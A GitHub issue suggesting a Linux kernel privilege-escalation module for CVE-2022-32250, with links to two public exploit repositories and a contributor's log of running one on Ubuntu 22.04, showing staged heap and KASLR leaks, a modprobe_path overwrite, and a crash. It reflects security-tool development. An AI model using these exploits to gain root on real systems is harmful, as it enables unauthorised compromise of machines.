Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

LPE nft_object UAF (CVE-2022-32250) #18468

Closed
h00die opened this issue Oct 18, 2023 · 1 comment
Closed

LPE nft_object UAF (CVE-2022-32250) #18468

h00die opened this issue Oct 18, 2023 · 1 comment
Labels
suggestion-module New module suggestions

Comments

@h00die
Copy link
Contributor

h00die commented Oct 18, 2023

Summary

More LPE the better! both work against Ubuntu

Basic example

https://github.com/theori-io/CVE-2022-32250-exploit (not reviewed)

https://github.com/ysanatomic/CVE-2022-32250-LPE (not reviewed)
@h00die h00die added the suggestion-module New module suggestions label Oct 18, 2023
@h00die
Copy link
Contributor Author

h00die commented Nov 15, 2024

Attempted POC 1:

git clone https://github.com/theori-io/CVE-2022-32250-exploit.git

user1@ubuntu2204:~$ uname -a
Linux ubuntu2204 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
user1@ubuntu2204:~$ cat /etc/os-release 
PRETTY_NAME="Ubuntu 22.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.2 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
user1@ubuntu2204:~$ cd CVE-2022-32250-exploit/
user1@ubuntu2204:~/CVE-2022-32250-exploit$ ./exp 


[------------------------- stage 0: Allocate stable table and set ------------------------]
[+] setting stable table1 and set
[+] setting stable table2 and set
[+] setting stable table3 and set
[+] setting stable table4 and set


[------------------------- stage 1: Leak heap address ------------------------------------]
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[-] leak failed, idkval: SPRAY-RING-000u
[-] leak failed, idkval: SPRAY-RING-001u
[+] leak successed, kmalloc-64 heap: 0xffff9fa449e6e958


[------------------------- stage 2: Leak KASLR address -----------------------------------]
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] spraying mqueue...
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] gathering mqueue...
[+] KASLR base: 0xffffffffa2dfff30
[+] modprobe addr: 0xffffffffa4c8b250


[------------------------- stage 3: Overwrite modprobe_path ------------------------------]
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] spraying mqueue...
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] gathering mqueue...


[------------------------- stage 4: Execute Malicious File -------------------------------]
[*] current modprobe name: /sbin/modprobe
open
user1@ubuntu2204:~/CVE-2022-32250-exploit$ ls -lah /tmp/shell
-rwxrwxr-x 1 user1 user1 16K Nov 15 14:09 /tmp/shell

When trying it from the direct terminal instead of SSHed in, I got a kernel dump and the box became unresponsive.

It's possible the patch was backported, but I don't care enough to keep looking and trying.

Attempted POC 2

user1@ubuntu2204:~/CVE-2022-32250-LPE$ gcc -lmnl -lnftnl exploit.c -o exploit
...
exploit.c:(.text+0x17): undefined reference to `nftnl_table_alloc'

I don't feel like debugging this code to make it compile, and hope the exploit works.

@h00die h00die closed this as completed Nov 15, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
suggestion-module New module suggestions
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@h00die